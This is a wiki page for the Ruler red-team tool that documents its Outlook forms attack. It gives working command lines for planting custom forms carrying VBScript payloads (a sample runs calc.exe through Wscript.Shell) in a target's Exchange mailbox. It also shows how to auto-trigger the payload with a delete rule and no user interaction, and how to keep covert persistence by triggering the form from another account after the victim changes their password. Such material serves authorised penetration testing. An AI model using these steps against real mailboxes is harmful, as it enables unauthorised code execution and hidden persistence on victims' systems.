Skip to content
Etienne Stalmans edited this page Oct 11, 2017 · 6 revisions

Forms

Ruler can also get shell through custom forms. This is especially useful for persistence, as a form can lie dormant in the inbox, nearly undetectable.

The basic premise behind forms is explained in the Outlook forms and shells.

To access the Forms option, you need to use the form command. There are multiple sub-commands to forms:

Setup

If you use the forms attack, you need to ensure that the templates folder is present in the current working directory. Ruler will need the files contained in this directory. Please copy the following files into it:

  • img0.bin
  • img1.bin
  • formstemplate.bin
  • formsdeletetemplate.bin

Display

You can view all existing forms using the display command. This fetches the list of existing forms from the exchange server and provides you with the full form name.

./ruler --email john@msf.com form display

Add

Unlike Rules, forms don't require a WebDAV instacnce and VBScript can be executed directly. A sample VBScript entry would be:

CreateObject("Wscript.Shell").Run "calc.exe", 0, False

The script needs to be supplied in either a file, or on the command line. To create a custom form:

./ruler --email john@msf.com form add --suffix superduper --input /tmp/command.txt --send

This will create a new form, of message class IPM.Note.superduper and use the script found in /tmp/command.txt as the VBScript to execute. Using --send simply task Ruler to send an email to the user, using their own account, and ensuring the correct message class is set (which triggers the form).

To trigger an existing form, you don't need send the email from the account that the form was created on. This is great for persistence, you simply need to have a valid Exchange based account (outlook.com is great) and know the suffix used for the form.

./ruler --email alice@outlook.com form send --target john@msf.com --suffix superduper

Trigger Form with a Rule

Nick Landers (@monoxgas) found that a form without event triggers, would call the VBScript payload on delete. This delete can be automated by creating a client-side rule to delete the message as it arrives in the mailbox.

This is a great way to auto-trigger the form, without requiring any user interaction. Ruler can automate this for you if you supply the --rule flag:

./ruler --email john@msf.com form add --suffix superduper --input /tmp/command.txt --rule --send

You will need to delete the newly created rule once your payload has triggered. This can be done using the delete command outlined rules.

Raw VBScript

If you don't want to use the built in template with the Item_Open triggers etc, you can supply a raw script by using the --raw option. This will simply insert your supplied VBScript directly into an empty script template.

Delete

Deleting an existing is done in a similar way to deleting rules.

./ruler --email john@msf.com form delete --suffix superduper

If the form has a rule associated with it (you used --rule when creating the form), Ruler will detect the rule and offer to delete it for you.

Send

Forms has it's own send command that can be used to trigger a form. This is great for triggering a form, which was created for persistence. You can even send the email from another account.

To send a message to trigger a form:

./ruler --email john@msf.com form send --prefix superduper

You can optionally provide a custom subject, body and target.

  • --subject - this allows you to provide a string with a custom signature
  • --body - provide a custom email body
  • --target - send the email to another user

Let's imagine you created a form called superduper in the inbox of the user koos@msf.com. You've subsequently lost access to the inbox, as the user changed their password. You can still trigger the form, as long as you've got an Exchange server to send the email from.

./ruler --email myownuser@someotherdomain.com form send --prefix superduper --subject "Hi Koos" --body "Hi Koos,\nJust checking in." --target koos@msf.com
Clone this wiki locally